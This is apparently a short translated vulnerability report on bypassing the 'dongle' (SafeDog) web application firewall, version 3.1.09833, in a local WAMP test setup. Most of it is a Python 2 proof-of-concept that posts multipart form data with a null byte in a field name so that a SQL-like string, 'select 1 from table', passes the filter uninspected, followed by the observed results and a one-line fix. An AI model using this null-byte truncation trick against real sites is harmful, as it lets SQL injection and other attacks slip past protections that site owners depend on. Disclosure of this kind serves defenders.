Dongle another defense rule bypass
The dongle is not properly handled somewhere, resulting in defense being bypassed.
1: During the test yesterday, the length seems to have bypassed the dongle defense. During the test today, we found that truncation also seems to be able to bypass the dongle defense.
2: Use wamp to build a web environment and use the latest version 3.1.09833 of dongle website protection.
3: Use the test code:
import urllib2url = "http://192.168.4.70/a.php"header = { 'User-Agent' : 'letmetest','Content-Type' : 'multipart/form-data; boundary=----WebKitFormBoundarycMYRelX1B2H69xy9'}def getdata(m): return "1"*mdef postdata(n): data = '------WebKitFormBoundarycMYRelX1B2H69xy9\r\n'# data += 'Content-Disposition: form-data; name="file"\r\n\r\n' # data += '%s\r\n' % "121212112121" # data += '------WebKitFormBoundarycMYRelX1B2H69xy9\r\n'# data += 'Content-Disposition: form-data; name="file"; filename="a.jpg\x00.aa"\r\n' # data += 'Content-Type: text/plain\r\n\r\n' # data += 'abc%23\r\n' data += '------WebKitFormBoundarycMYRelX1B2H69xy9\r\n' data += 'Content-Disposition: form-data; name="\x00test"\r\n\r\n' data += '%27abcd\r\n' data += '------WebKitFormBoundarycMYRelX1B2H69xy9\r\n' data += 'Content-Disposition: form-data; name="submit"\r\n\r\n' data += 'select 1 from table\r\n' data += '------WebKitFormBoundarycMYRelX1B2H69xy9--\r\n\r\n' return dataproxy = "http://127.0.0.1:8080"opener = urllib2.build_opener(urllib2.ProxyHandler({'http':proxy}))urllib2.install_opener(opener)request = urllib2.Request(url,postdata(10),header)response = urllib2.urlopen(request).read()print response
Note that \ x00 at name is used to test addition and not addition respectively.
4: result when adding:
The submitted content is displayed directly.
Result When \ x00 is not added:
The prompt is intercepted by the dongle.
5: It seems that due to my truncation, the dongle has not detected the select 1 from table content.
Solution:
Process special content